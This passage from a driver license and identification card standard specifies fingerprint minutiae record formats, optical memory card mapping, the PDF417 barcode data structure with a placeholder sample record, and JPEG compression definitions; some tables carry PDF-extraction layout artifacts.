Minutiae Finger Minutia data Finger Minutia data +Finger number 0 -3 quality 0 - 100 # of minutiae See C.12.4 below See C.12.4 below +1 byte 1 byte 1 byte 6 bytes 6 bytes 6 bytes +47 + +C.12.4 Finger Minutiae Data +C.11.2.2.1 C.11.2.2.2 C.11.2.2.1 C.11.2.2.2 C.11.2.2.3 C.11.2.2.4 +Minutia Type X location Reserved Y location Minutia Angle Minutia Quality +type xcoordinate reserved ycoordinate angle in 2 deg quality, 0-100 +2 bits 14 bits 2 bits 14 bits 1 byte 1 byte +2 bytes 2 bytes +C.12.5 Private (Proprietary) Data +C.11.3.1 C.11.3.2 C.11.3.3 +Type ID Length Private Data Private Data +Type ID code Length private +2 bytes 22 bbyytteess (‘Length’ – 4) +bytes +48 + +C.13 Interoperable Matcher Performance (Informative) +The concept of operation for 1 to 1 verification matching is as follows. All compliant equipment will provide a minutia +records consisting of at least the public areas defined above. Based on the data contained in these fields, and the +common definitions of minutia points and their locations and angles, all compliant vendors will be able to achieve some +reasonably high level of performance in verifying a live sample against the public record. This is represented by +“Algorithm B” matching in the diagram below. Note that “Algorithm A” produces the record, and “Algorithm B” reads +only the public area. +However, the optimum in performance (defined as minimal False Accept Rate and False Reject Rate) may be +achieved by using proprietary methods and features. To allow vendors to support this enhanced level of performance, +the proprietary or “private” data area allows additional data to be present. If the reading and matching equipment can +interpret and make use of this additional data (either because the same vendor supplies it, or because of cross- +licensing of technology or other collaboration), then higher levels of performance may be achieved. This situation is +represented by “Algorithm A” matching below. +Finger Algorithm A +Standard Standard Algorithm A +Image Template +Header Minutiae Proprietary +Collection Generation +Finger Image Algorithm A +Verification +Collection Matching +Results +Finger Image Algorithm B +Verification +Collection Matching +Results +Figure C.3 - Interoperability Concept +49 + +C.14 Compliance (Informative) +Interoperability of one-to-one matching relies on each matcher to adhere within a tolerance to the determination of the +minutiae. Compliance with this specification is important in two areas: format compliance and minutiae extraction +accuracy. +Testing for compliance is not described in this standard; refer to applicable Best Practices documents for further +description. +C.14.1 Record format compliance +Equipment and algorithms that are compliant with this standard must observe the format and syntax described herein. +This includes: order and size of fields, presence of all required fields, adherence to range limits on values, and internal +consistency (the number of single finger records must match the number of fingers, for example). +C.14.2 Finger Minutiae Extraction +Finger images of sufficiently good quality should generate minutiae records that are “sufficiently similar” for all +compliant equipment and algorithms. This is essential to the underlying goal of interoperability. Testing for this +requirement may consist of encoding and formatting of data from a test set of sample images, with a known set of +minutiae features. The equipment under test may be evaluated based on the number of minutiae points that differ from +the known standard by a significant degree, and on the number of minutiae points detected by one system and not the +other. Standards for these metrics (degree of difference, allowable numbers of differences) are dependent on the +specific application. +50 + +C.15 Example MInutiae Record (Informative) +This example minutiae record demonstrates the format for a given set of data. +C.15.1 Data +Scan System: Vendor ID = 0x42, Feature Extraction SW Version code 0x11, Scanner ID = 0x00B5 +(these values are determined by the IBIA (for the Vendor ID) and by the vendor) +Sensor Resolution: 500 dpi in both X and Y axes; 196.85 pixels per cm, Image was 512 by 512 pixels +Plain live-scan prints of the left and right index fingers +Left Index: Finger quality is 90% of the maximum possible +27 minutia, listed in table below. +No private feature data +Right Index: Finger quality is 70% of the maximum possible +22 minutia, listed in table below. +Private feature data area (Type 01) consisting of six bytes: 0x01, 0x44, 0xBC, 0x36, 0x21, 0x43 +Record length = 340 = 26 (record header) + 2 * 4 (finger headers) + 27 * 6 (minutia for 1st finger) + +22 * 6 (minutia for 2nd finger) + 2 (null private area for 1st finger) + 10 (private area for 2nd finger) +Minutia Left Index Finger Right Index Finger +# Type X Y Angle quality Type X Y Angle quality +0 Ending 100 14 112 90 ending 40 93 0 90 +1 Ending 164 17 85 80 bifurcation 116 100 0 80 +2 Bifurcation 55 18 22 90 ending 82 95 12 70 +3 Bifurcation 74 22 76 60 bifurcation 140 113 15 70 +4 Ending 112 22 90 80 ending 122 135 18 80 +5 Bifurcation 42 31 44 90 bifurcation 55 72 21 50 +6 Bifurcation 147 35 51 90 ending 94 74 24 60 +7 Ending 88 38 165 40 ending 155 62 42 80 +8 Bifurcation 43 42 4 80 bifurcation 42 64 55 70 +9 Ending 56 48 33 70 ending 155 85 59 80 +10 Ending 132 49 72 90 bifurcation 96 192 62 80 +11 Bifurcation 71 50 66 80 ending 114 86 85 80 +12 Other 95 51 81 90 bifurcation 142 90 90 70 +13 Ending 112 53 132 50 ending 57 137 90 90 +14 Bifurcation 135 58 32 80 ending 131 75 90 80 +15 Other 41 60 59 70 ending 45 113 98 80 +16 Bifurcation 67 62 145 90 bifurcation 111 171 114 50 +17 Ending 91 63 132 80 ending 95 62 156 60 +18 Ending 112 65 33 60 bifurcation 61 114 165 80 +19 Ending 53 71 45 90 bifurcation 143 72 171 80 +20 Bifurcation 104 74 12 80 ending 63 104 172 70 +21 Ending 75 79 21 90 bifurcation 125 73 173 40 +22 Bifurcation 48 80 92 90 +23 Ending 130 89 45 80 +24 Bifurcation 63 95 126 80 +25 Ending 47 108 164 90 +26 Bifurcation 126 115 172 30 +51 + +C.15.2 Example Data Format Diagrams +C.11.1.1 C.11.1.2 C.11.1.3 C.11.1.4 C.11.1.5 C.11.1.6 +Format ID Spec Version Record Length Vendor ID SW ID Scanner ID +’F’‘M’‘R’0 ’0’‘1’‘0’0 0x0154 0x0042 0x0011 0x00B5 +C.11.1.7 C.11.1.8 C.11.1.9 C.11.1.10 C.11.1.11 C.11.1.12 +X image size Y image size X scan rate Y scan rate # of fingers Reserved byte +0x0200 0x0200 0x00C5 0x00C5 0x02 0x00 +512 decimal 512 decimal 197 decimal 197 decimal # of fingers reserved +C.11.2.1.1 C.11.2.1.2 C.11.2.1.3 C.11.2.1.4 +Finger Position Impression Type Finger Quality Number of Minutiae +0x07 0x00 0x5A 0x1B +left index plain live-scan 90 decimal 27 minutiae +C.11.2.2. +C.11.2.2. C.11.2.2.3 C.11.2.2.4 +X2 Location +Y2 Location Minutia Angle Minutia Quality +and Type +0x4064 0x000E 0x70 0x5A +0x4000 (type) 14 decimal 112 90 decimal +& 100 decimal decimal +C.11.2.1.1 C.11.2.1.2 C.11.2.1.2 C.11.2.1.3 +Finger Position Impression Type Finger Quality Number of Minutiae +0x02 0x00 0x46 0x16 +right index plain live-scan 70 decimal 22 minutiae +C.11.2.2. +C.11.2.2. C.11.2.2.3 C.11.2.2.4 +X2 Location +Y2 Location Minutia Angle Minutia Quality +and Type +0x4028 0x005D 0x00 0x5A +0x4000 (type) 93 decimal 0 decimal 90 decimal +& 93 decimal +C.11.3.1 C.11.3.1 C.11.3.2 C.11.3.3 +Private Area Type IDPrivate Area Type ID Private Data Length Private data +0x0000 0x0001 0x000A 0x0144BC362143 +52 + +C.15.3 Raw Data for the Resulting Minutiae Record +Record Header: +0x464D52003031300001540042001100B50200020000C500C50200 +1st Finger Header: +0x07005A1B +1st Finger Minutiae data: +0x4064000E705A 0x40A400115550 0x80370012165A +0x804A00164C3C 0x407000165A50 0x802A001F2C5A +0x80930023335A 0x40580026A528 0x802B002A0450 +0x403800302146 0x40840031485A 0x804700324250 +0x005F0033515A 0x407000358432 0x8087003A2050 +0x0029003C3B46 0x8043003E915A 0x405B003F8450 +0x40700041213C 0x403500472D5A 0x8068004A0C50 +0x404B004F155A 0x803000505C5A 0x408200592D50 +0x803F005F7E50 0x402F006CA45A 0x807E0073AC1E +2nd Finger Header: +0x02004616 +2nd Finger Minutiae data: +0x4028005D005A 0x807400640050 0x4052005F0C46 +0x808C00710F46 0x407A00871250 0x803700481532 +0x405E004A183C 0x409B003E2A50 0x802A00403746 +0x409B00553B50 0x806000C03E50 0x407200565550 +0x808E005A5A46 0x403900895A5A 0x4083004B5A50 +0x402D00716250 0x806F00AB7232 0x405F003E9C3C +0x803D0072A550 0x808F0048AB50 0x403F0068AC46 +0x807D0049AD28 +1st Private Data Area: +0x0000 +2nd Private Data Area: +0x0001000A0144BC362143 +53 + +54 + +Annex D +(normative) +Mapping of driver license/identification card information to optical memory +cards +Introduction +This annex defines mapping of the driver license/identification card machine-readable data elements, as defined in +clause 6, onto an optical memory card. +D.1 Conformance +A driver license/identification card that incorporates optical memory shall comply with the following standards; ISO/IEC +11693 and 11694 Parts 1 - 4. +D.2 File location +The Information content of the magnetic stripe, defined in annex A of this standard shall be written to both the first and +last user data tracks of the optical memory card. The data shall be written as ASCII exactly duplicating the data format +and structure defined in A.4. Unused sectors in the first and last user data tracks shall be reserved for future use. +D.3 Updating of data +The data written to the first and last user data tracks shall be read-only. If updating of the data is permitted, additional +sectors in the first and last user data tracks may be used to control access for updating purposes and to specify the +location of the updated data. The original data in the first and last user data tracks shall remain unchanged in order to +provide an audit trail. +55 + +56 + +Annex E +(normative) +Mapping of driver license/identification card information to 2 dimensional bar +codes +Introduction +This annex defines mapping of the driver license/identification card machine-readable information elements, as defined +in clause 6, onto a 2 Dimensional bar code. +E.1 Conformance +A prerequisite for conformance with this standard for bar coding is conformance with ANSI X3.182, ANSI/ASQC Z1.4, +ASCII/ISO 646, ASCII/ISO 8859-1, ISO/IEC 15438, and MIL-L-61002. +E.2 Symbology +The PDF417 symbology (see ISO/IEC 15438 Automatic Identification and Data Capture Techniques - International +Two-dimensional Symbology Specification - PDF417) shall be used for the Drivers License application. +For the Drivers License Application, the following PDF417 symbology variants as defined in the ISO/IEC 15438 +Automatic Identification and Data Capture Techniques - International Two-dimensional Symbology Specification - +PDF417 shall NOT be used. +¾ Compact PDF417 +¾ MicroPDF417 +¾ MacroPDF417 +E.3 Card Characteristics +E.3.1 Symbology Characteristics +The symbology characteristics shall conform to ISO/IEC 15438. +E.3.2 Dimensions and Print Quality +E.3.2.1 Narrow element dimension +The narrow element dimension (X dimension) range shall be from .170mm (.0066 inch) to .380mm (.015 inch) as +determined by the printing capability of the supplier/printer. Symbols with narrow elements at the lower end of this +range, i.e., .170mm (.0066 inch) to .250mm (.010 inch), may require special care to meet the print quality +requirements of this standard. +57 + +E.3.2.2 Row height +The PDF417 symbol shall have a minimum row height (height of the symbol element) of three (3) times the width of +the narrow element (“X” dimension). Increasing the row height may improve scanning performance but will reduce the +number of characters that can be encoded in a given space. +E.3.2.3 Quiet zone +The PDF417 symbol shall have a minimum quiet zone of 1X (X = the narrow element dimension) above, below, to the +left, and to the right. The quiet zone is included within the calculation of the size of the symbol. +E.3.2.4 Print Quality +The AIMUSA Uniform Symbology Specification PDF417 and ANSI X3.182 Bar Code Print Quality - Guideline shall be +used to determine the print quality of the PDF417 symbol. +For the drivers license application the minimum symbol grade shall be 3.5/10/660, where: +Recommended Print Quality grade 3.5 (A) at the point of printing the symbol before lamination and a Print Quality +Grade of 2.5 (B) after lamination. +Measurement Aperture = .250mm (0.010 inch) +Light Source Wavelength = 660 nanometers (nm) ± 10 nm +The above symbol quality and measurement parameters assure scanability over a broad range of scanning +environments. +It is important that the bar code be decodable throughout the system of use. For this reason, quality tests shall not be +limited to production inspection but also shall be followed through to the end use. +E.3.2.5 Sampling +To ensure that printed on-demand bar code symbols meet the above Print Quality specification, it is recommended +that a sample set of symbols, produced in their final form, be verified a minimum of once per day. +Military Standard, Sampling Procedures and Tables for Inspection by Attributes (ANSI/ASQC Z1.4), provides useful +guidelines for statistically valid sampling plans. Acceptable quality levels (AQL) may be established prior to quality +control inspection. +E.3.2.6 Symbol Durability +If Bar Code Symbol durability is required then the test method in Annex G, G.5, should be used. +E.3.3 Bar code area +The bar code area shall be located on the back side of the drivers license card. The maximum width of the PDF417 +symbol shall be 75.565 mm (2.975”). The maximum height of the PDF417 symbol shall be 38.1 mm (1.50”). +E.3.4 Orientation and Placement +E.3.4.1 PDF417 Orientation +All PDF417 symbols and linear bar codes shall have the same orientation. The bars of the PDF417 symbol shall be +perpendicular to the natural bottom of the card. (see Figure E-1). +58 + +The symbol skew shall not be more than ±5 degrees. +E.3.4.2 Designing the Card Layout +Figure E.1 — Orientation of PDF417 symbol on bottom +Plan for the maximum amount of data: +Determine the mandatory and optional fields that will be required in the message, and the maximum anticipated length +of each field. Add in the additional characters needed for formatting. +Plan for the maximum “X” dimension(s) that may be used: +Since the supplier/printer of the card ultimately determines the “X” dimension at which the symbol will be printed, it is +possible that a PDF417 symbol could be printed at any “X” dimension from .0066 inch to .015 inch. The largest “X” +dimension that allows all the data to fit in the maximum area available shall be used when printing the symbol. +E.4 Information contents and formats +E.4.1 Data Structure +All compliant 2D symbols shall employ a HEADER which shall allow interested parties to interpret the encoded data. +SUBFILES shall be employed to carry the specific information. The combination of a HEADER and one or more +SUBFILE DESIGNATORS shall make up a compliant 2D symbol. +Each 2-Dimensional bar code shall begin with a file header that will identify the bar code as complying with the +standard. The header shall be followed by a Subfile Designator “DL” to identify the Drivers License data type stored in +the file. Each data element contained in a Subfile shall be prefaced by a Field Identifier as defined in E.4.4.1 and +E.4.4.2. The use of a field separator character shall serve to both terminate a field and indicate the presence of a +following field identifier. +E.4.2 Header +Compliant 2D Symbol’s must begin with a Header in the following format: +Table E.1 — 2D symbols header format +Field Bytes Contents +1 1 Compliance Indicator: A 2D symbol encoded according to the rules +of this standard shall include a Compliance Indicator. The Compliance +Indicator as defined by this standard is the Commercial At Sign (“@”) +(ASCII/ISO 646 Decimal “64”) (ASCII/ISO 646 Hex “40”). The +Compliance Indicator is the first character of the symbol. +59 + +Field Bytes Contents +2 1 Data Element Separator: The Data Element Separator is used in this +standard to indicate that a new data element is to follow, and that the +current field is terminated. Whenever a Data Element Separator is +encountered (within a Subfile type which uses Data Element +Separators), the next character(s) shall either be a Segment +Terminator or shall define the contents of the next field according to +the template of the specific Subfile. The Data Element Separator as +defined by this standard is the Line Feed character (“L ” ASCII/ISO 646 +F +Decimal “10”) (ASCII/ISO 646 Hex “0A”). The Data Element Separator +is the second character of the symbol. +3 1 Record Separator: The Record Separator as defined by this +standard is the Record Separator character (“R ” ASCII/ISO 646 +S +Decimal “30”) (ASCII/ISO 646 Hex “1E”). As this report is presented +for ratification, there is no special case defined for when this field will +be used. It is embodied within the recommendation for future growth. +The Record Separator is the third character of the symbol and shall +always be reflected within the header in a compliant symbol. +4 1 Segment Terminator: As used in this standard the Segment +Terminator is used to end Subfiles where Field Identifiers are +employed. The Segment Terminator as defined by this standard is the +Carriage Return character (“C ” ASCII/ISO 646 Decimal “13”) +R +(ASCII/ISO 646 Hex “0D”). The Segment Terminator is the fourth +character of the symbol. +5 5 File Type: This is the designator that identifies the file as an AAMVA +compliant format. The designator is defined as the 5 byte upper +character string “ANSI “, with a blank space after the fourth character +. +6 6 Issuer Identification Number (IIN): This number uniquely identifies +the issuing jurisdiction and can be obtained by contacting the ISO +Issuing Authority (AAMVA). +7 2 Version Number: This is a decimal value between “0 and 63”, that +specifies the version level of the Hi-Density bar code format. Version +“0” is reserved for bar codes printed to the specification of the +American Association of Motor Vehicle Administrators (AAMVA) prior +to the adoption of this AAMVA National Standard. All bar codes +compliant with this standard shall be designated Version “1” and are +likely to remain Version “1”, but should a need arise requiring major +revision to the format, this field provides the means to accommodate +revision. +8 2 Number of Entries: This is a decimal value between “01 and 99” that +specifies the number of different Subfile types that are contained in the +bar code. This value defines the number of individual SUBFILE +DESIGNATORS which follow. All subfile designators (as defined +below) follow one behind the other. The data related to the first Subfile +Designator follows the last Subfile Designator. +60 + +E.4.3 Subfile Designator +All compliant 2D bar code symbols must contain the “DL” subfile structure as defined below immediately after the +Header as defined in E.4.2. +Field Bytes Contents +1 2 Subfile Type: This is the designator that identifies what type of +data is contained in this portion of the file. The 2 character +uppercase character field “DL” is the designator for Drivers License +Subfile type containing Required and Optional data elements as +defined in Sections 6.2, E.4.4.1 and E.4.4.2. Any jurisdiction has +the right to define a Subfile Type to contain jurisdiction specific +information provided that the Subfile type is a 2 character +uppercase character field whose first character is “Z”. +2 4 Offset: These bytes contain a 4 digit numeric value that specifies +the number of bytes from the head or beginning of the file to where +the data related to the particular sub-file is located. The first byte in +the file is located at offset 0. +3 4 Length: These bytes contain a 4 digit numeric value that specifies +the length of the Subfile in bytes. +E.4.4 Elements +Tables E.4.4.1 and E.4.4.2 define required and optional data elements which may be included in the “DL” subfile type. +Jurisdiction specific data elements may also be encoded provided that the Bar Code ID is a 3 character uppercase +character field beginning with “Z” Jurisdiction specific data elements shall be stored in a “Z” subfile type. +E.4.4.1 Required +Data Element Ref. # Bar Code ID +Driver License Name 1 DAA +Driver Mailing Street Address 1 2 DAG +Driver Mailing City 3 DAI +Driver Mailing Jurisdiction Code 4 DAJ +Driver Mailing Postal Code 5 DAK +Driver License/ID Number 6 DAQ +Driver License Classification Code 8 DAR +Driver License Restriction Code 9 DAS +Driver License Endorsements Code 10 DAT +Driver License Expiration Date 11 DBA +Date of Birth 12 DBB +Driver Sex 13 DBC +Driver License or ID Document Issue 14 DBD +Date +E.4.4.2 Optional +Data Element Ref. # Bar Code ID +Height (FT/IN) 20 DAU +Weight (LBS) 21 DAW +61 + +Data Element Ref. # Bar Code ID +Eye Color 22 DAY +Hair Color 23 DAZ +Social Security Number 24 DBK +Driver Permit Classification Code 25 PAA +Driver Permit Expiration Date 26 PAB +Permit Identifier 27 PAC +Driver Permit Issue Date 28 PAD +Driver Permit Restriction Code 29 PAE +Driver Permit Endorsement Code 30 PAF +Driver Last Name 31 DAB +Driver First Name 32 DAC +Driver Middle Name or Initial 33 DAD +Driver Name Suffix 34 DAE +Driver Name Prefix 35 DAF +Driver Mailing Street Address 2 36 DAH +Driver Residence Street Address 1 37 DAL +Driver Residence Street Address 2 38 DAM +Driver Residence City 39 DAN +Driver Residence Jurisdiction Code 40 DAO +Driver Residence Postal Code 41 DAP +Height (CM) 42 DAV +Weight (KG) 43 DAX +Issue Timestamp 44 DBE +Number of Duplicates 45 DBF +Medical Indicator/Codes 46 DBG +Organ Donor 47 DBH +Non-Resident Indicator 48 DBI +Unique Customer Identifier 49 DBJ +Driver "AKA" Date Of Birth 50 DBL +Driver "AKA" Social Security Number 51 DBM +Driver "AKA" Name 52 DBN +Driver "AKA" Last Name 53 DBO +Driver "AKA" First Name 54 DBP +Driver "AKA" Middle Name 55 DBQ +Driver "AKA" Suffix 56 DBR +Driver "AKA" Prefix 57 DBS +E.4.5 Example of 2D Symbol +Following is an example of a 2D symbol printed in accordance with this standard and containing the following +information: +Drivers License Number: 0123456789ABC +Driver License Name: John Q Public +Driver Street Address: 123 Main Street +Driver Mailing City: Anytown +Driver Mailing Jurisdiction Code: VA +Driver Mailing Postal Code: 123459999 +Driver Class Code(s): DM +DL Restriction Codes: (none) +62 + +Driver License Endorsements: (none) +Height: 509 +Weight: 175 +Eye Color: BL +Hair Color: BR +DL Expiration Date: 20011201 +Date of Birth: 19761123 +Driver Sex: M +Driver License Document Issue Date: 19961201 +Jurisdiction Defined Code: JURISDICTIONDEFINEDELEMENT +when decoded would result in a data stream as follows (Note: b = Blank): +@L R C ANSIb 6360000102DL00390187ZV02260031DLDAQ0123456789ABCL +F S R F +DAAPUBLIC,JOHN,QL DAG123b MAINb STREETL DAIANYTOWNL DAJVAL DAK123459999bb L +F F F F F +DARDMbb L DASbbbbbbbbbb L DATbbbbb L DAU509L DAW175L DAYBLb L DAZBRb L DBA20011201L +F F F F F F F F +DBB19761123L DBCML DBD19961201C ZVZVAJURISDICTIONDEFINEDELEMENTC +F F R R +This data, when broken down further, can be better understood as: +HEADER, +@ the first character in any compliant 2D symbol +L the character to represent a Data Element Separator +F +R the character to represent a Record Separator +S +C the character used represent a Segment Terminator +R +ANSIb which indicates that the symbol meets the AAMVA National Standard, and a blank space +636000 which indicates the jurisdiction (Virginia) that printed the symbol +01 which indicates that the rest of the data follows version 1 of the AAMVA National Standard +02 which indicates the number of Subfile Designators and indicates (in this example) that two follow +SUBFILE DESIGNATOR, +DL and ZV indicates the subfile types +DL (Drivers License) +0039 which indicates the offset from the beginning of the symbol to the start of the related subfile +0187 which indicates the length of the subfile type +ZV (Jurisdiction Defined) +63 + +0226 which indicates the offset from the beginning of the symbol to the start of the related Subfile +0031 which indicates the length of the Subfile type +SUBFILE DATA, +DLwhich is the Subfile Identifier +DAQ0123456789ABCL which is the Field Identifier (FI) for our example, which would mean a Drivers License Number +F +follows, and a 13 position Drivers License Number, and Data Element Separator (DES) +DAAPUBLIC,JOHN,QL which is the FI for Name, the Name with required separators, and DES +F +DAG123b MAINb STREETL which is the FI for Street Address, the Street Address, and DES +F +DAIANYTOWNL which is the FI for City, and the City, and DES +F +DAJVAL which is the FI for Jurisdiction Code, and the Jurisdiction Code, and DES +F +DAK123459999bb L which is the FI for Postal Code, the Postal Code padded to an 11 digit fixed length, and DES +F +DARDMbb L which is the FI for Class Code, the Class Code padded to 4 digit fixed length, and DES +F +DASbbbbbbbbbb L which is the FI for the ANSI D-20 Restriction Codes, and the Restriction Codes padded to 10 digit +F +fixed length, and the DES +DATbbbbb L which is the FI for the ANSI D-20 License Endorsements, and the Endorsements padded to 5 digit fixed +F +length, and the DES +DAU509L which is the FI for Height, and the Height (ft/in), and DES +F +DAW175L which is the FI for Weight, the weight in lbs, and DES +F +DAYBLb L which is the FI for Eye Color, the ANSI D-20 Eye Color, and DES +F +DAZBRb L which is the FI for Hair Color, the ANSI D-20 Hair Color, and DES +F +DBA20011201L which is the FI for Expiration Date, the Expiration Date (YYYYMMDD), and DES +F +DBB19761123L which is the FI for Birthdate, the Birthdate (YYYYMMDD), and DES +F +DBCML which is the FI for Sex, the ANSI D-20 Sex Code, and DES +F +DBD19961201which is the FI for Document Issues Date, the Date (YYYYMMDD) +C which is a Segment Terminator +R +ZVwhich is the Subfile Identifier +ZVA JURISDICTIONDEFINEDELEMENT which is the FI for a Jurisdiction Defined Data Element, and the data +C which is a Segment Terminator. +R +64 + +E.5 Error Detection and Correction +PDF417 symbols shall use a minimum Error Correction Level of 3. Where space allows, an Error Correction Level of 5 +is recommended. +E.6 Character Sets +The AAMVA community shall use the 256 character table known as ASCII/ISO 8859-1 as the character set table when +generating Hi-Density symbols and for efficiency shall use the 128 character subset TEXT COMPACTION TABLE as +defined in the specification. +E.7 Compression +No specific recommendation is presented at this time. The AAMVA community has no need to employ specific +Compression techniques beyond the field truncation constructs incorporated into the overall Data Structure option +recommended in this standard. +65 + +66 + +Annex F +(normative) +Driver license/identification card compression for digital imaging +Introduction +This annex contains the required elements to use JPEG and Greyscale compression for Storage and Transmission of +images between jurisdictions. +F.1 Conformance +A License or Identification Card photo and signature image that incorporates Storage and Transmission of said images +shall comply with the following: ISO 10918-1 and ITU-T Group III and IV. +F.2 Definitions +F.2.1 +binary +Binary refers to black and white images. The data bit is either on or off. +F.2.2 +CCITT +CCITT is the current standard for binary image compression. Primarily used in fax transmissions, CCITT Groups III +and IV were defined by the International Consultative Committee on Telegraph and Telephone. CCITT was +reorganized in 1993 and is now known as ITU-T. +F.2.3 +color +a continuous tone image that has more than one component +F.2.4 +Continuous Tone Image +an image whose components have more than one bit per sample +F.2.5 +Gray Scale +a continuous tone image that has only one component +F.2.6 +JPEG +JPEG is the proposed compression standard for continuous tone images. It was published in 1993 as ISO 10918-1 +and ITU-T T.81. It was produced by the Joint Photographic Experts Group. +67 + +F.2.7 +pixel +a pixel is a picture element - one of an n by m matrix of picture elements, where n is across (horizontal) and m is down +(vertical) +F.2.8 +Still Image (Digital) +a set of two-dimensional arrays of data +F.2.9 +TIFF (Tagged Image File Format) +industry accepted practice for storing image information +F.2.10 +(Adaptive) (Binary) Arithmetic Encoder +an entropy encoding procedure, which codes by means of a recursive subdivision of the probability of the sequence of +symbols coded up to that point +F.2.11 +(Uniform) Quantization +the procedure by which discrete cosine transform (DCT) coefficients are linearly scaled in order to achieve +compression +F.2.12 +8x8 Block +an 8x8 array of samples +F.2.13 +Component +one of the two-dimensional arrays which comprise an image +F.2.14 +Compressed Image Data +a coded representation of an image +F.2.15 +compression +reduction in the number of bits used to represent source image data +F.2.16 +Controlled Quality (Lossy) +A descriptive term for encoding and decoding processes which are not lossless. Controlled quality compression allows +for varying compression ratios at various quality levels. +F.2.17 +decoding process +a process, which takes as its input, compressed image data and outputs a continuous tone image +F.2.18 +encoding process +a process, which takes as its input a continuous tone image and outputs compressed image data +F.2.19 +entropy decoder +a lossless procedure which recovers the sequence of symbols from the sequence of bits produced by the entropy +encoder +68 + +F.2.20 +entropy encoder +a lossless procedure which translates a sequence of input symbols into a sequence of bits such that the average +number of bits per symbol approaches the entropy of the input symbols +F.2.21 +hierarchical +A method of encoding an image in which the first frame for a given component is followed by frames which code the +differences between the source data and the reconstructed data from the previous frame for that component. +Resolution changes are allowed between frames. +F.2.22 +Huffman Encoder +an entropy encoding procedure which assigns a variable length code to each input symbol +F.2.23 +Huffman Table +the set of variable length codes required in a Huffman encoder and Huffman decoder +F.2.24 +Interchange Format +the representation of compressed image data for exchange between application environments +F.2.25 +interleaved +the descriptive term applied to the repetitive multiplexing of small groups of data units from each component in a scan +in a specific order +F.2.26 +JFIF (JPEG File Interchange Format) +JFIF is a minimal file format, which enables JPEG bit streams to be exchanged between a wide variety of platforms +and applications +F.2.27 +lossless +a descriptive term for encoding and decoding procedures in which it is guaranteed that no information is lost from input +to output +F.2.28 +non-interleaved +the descriptive term applied to the data unit processing sequence when the scan has only one component +F.2.29 +Progressive (Coding) +one of the DCT-based or hierarchical processes defined in the JPEG standard in which each scan typically improves +the quality of the reconstructed image +F.2.30 +quantization tables +the set of 64 scalar quantization values used to the DCT coefficients +F.2.31 +Run (Length) +number of consecutive symbols of the same value +69 + +F.2.32 +Sample +one element in the two-dimensional array which comprises a component +F.2.33 +scan +a single pass through the data for one or more of the components in an image +F.2.34 +Sequential (Coding) +one of the lossless or DCT-based coding processes defined in the JPEG standard in which each component of the +image is encoded within a single scan +F.3 Information Contents and Formats +F.3.1 Requirements for Photographs and Signatures +F.3.1.1 Color Photo Images +Table F.3 defines the recommended requirement for color photo images by shading in the options recommended for +licensing/identification applications. +F.3.1.1.1 Image Data Formats +The image header can define the image size, the number of bits per pixel, the scan start and scan order. This allows +any application to process the images appropriately. For color photo images, 16 bits per pixel or 24 bits per pixel are +required. Typically, 16 bit acquisition devices are less expensive than 24 bit and give good quality results. If the +compression is 16 bit Y,Cb,Cr, then the input of 16 bit 5R,6G,5B or 5R,5G,5B or 6R,6G,4B or 24 bit RGB doesn't +matter. +F.3.1.1.2 Image Compression Standard +For color photo images, the JPEG baseline defined to be controlled quality, 8 bit per component, sequential DCT with +Huffman coding is required. +F.3.1.1.3 Associated JPEG Parameters +F.3.1.1.3.1 Interchange Format +Tables F.1 and F.2 specify the recommended file interchange format. This file interchange format is in the spirit of +JFIF and adds application specific information. +Table F.1 — Recommended File Interchange Format +Field Length Comments +(in bytes) +SOP 2 Start of Packet +Non JPEG 2 Indicates start of non-JPEG data +Length 2 Application data segment length +* Version 3 JPEG version +Units 1 Units for the X and Y densities: +units =0: no units, X & Y specific aspect ratio +units =1: X & Y are dots per inch +units =2: X & Y are dots per centimeter +70 + +Field Length Comments +(in bytes) +X density 2 Horizontal pixel density +Y density 2 Vertical pixel density +X size 2 Horizontal size based on units +(in/cm) +Y size 2 Vertical size based on units (in/cm) +* Color Space 1 O=Y , Cb, Cr +Scan Order 1 Orientation of Image: +0 = 0 degrees, 1 = 90, 2 = 180, 3 = 270 +(degrees in navigational terms) +Annotation 1-255 NULL terminated string could include name license +number, etc. +X’FF’, SOI 2 Start of Image (JPEG) +** X’FF’, DQT 2+N *65 Nq = number of quantization tables +Length (see Table F.2 +Quantization Comments) +Table Parameters +** X’FF’, DHT 2+N*(17+m) Nh = Number of Huffman tables +Length Huffman Table (see Table F.2 m=S of number of codes of lengths 1 - 16 +Parameters Comments) +X’FF’, SOFO 8+3*N Nf = Number of image components in a frame +Length Frame (see Table F.2 +Parameters Comments) +X’FF’, SOS 6+2*N Ns = Number of image components in a scan +Length Scan (see Table F.2 +Parameters Comments) +(entropy coded scan +data) +X’FF’, EOI 2 End of image +EOP 2 End of Packet +Table F.2 — Recommended file interchange format +Comments: +¾ All the AAMVA specific information and tables shall be “sent” once in an abbreviated stream to +minimize overhead cost. +¾ Type of compression, number of lines, and number of samples per line are included in the frame +header. +¾ Nq = Nh = 2 for color Nq = Nh = 1 for gray scale +Nf = Ns = 3 for color Nf = Ns = 1 for gray scale +For Color: +¾ 1st component C1 = 1= Y component +¾ 2nd component C2 = 2 = Cb component +¾ 3rd component C3 = 3 = Cr component +* Information is included for flexibility in the event of future changes +** Allows for a JPEG abbreviated table stream: X’FF’, SOI, X’FF’, DQT, table(s), DHT, table(s), X’FF’, +EOI where the tables are sent once before the first image and not with subsequent images. +71 + +F.3.1.1.3.2 Color Space Translation +TIFF and JFIF (JPEG File Interchange Format) suggest the CCIR recommendation 601-1 and the associated +translation to Y,Cb,Cr as shown below: +Y = 0.299R + 0.587G + 0.114B +Cb = 128 - 0.1687R - 0.3313G + 0.5B +Cr = 128 + 0.5R - 0.4187G - 0.0813B +If the numbers exceed 255, they shall be clamped at 255. Similarly, if they under flow, they shall be clamped at zero +(0). +Table F.3 — Required for color images +CATEGORY DECISION POINTS +Image Data · Size +Formats · Scan Start +· Scan Order +· Pixel Format +Bits Per Pixel 16 or 24 8, 10, 12, 32 +Standard JPEG Baseline JPEG Extension +· Controlled Quality · Lossless; +· 8 Bit per Component; · Progressive DCT; +· Sequential DCT; · Arithmetic Coding; & +· Huffman Coding; and · Greater than 8 bits +· Restart Codes +Conversion Scheme Left Justify +Color Space R,G,B to Y, Cb, Cr Other +Translation Color Space Options +· RGB +CMYK +HIS +Others +Interleaved Yes No +Subsampling ratio 2 Horizontal & 2 Vertical Any Combination of +2 Horizontal +No Subsampling · 1, 2, 3, or 4 +Horizontal & +· 1, 2, 3, or 4 Vertical +Huffman Tables Send Once Send with Each Data +Stream +Send Once Send with Each Data +Quantization tables Stream +F.3.1.1.4 Options to Optimize Performance +F.3.1.1.4.1 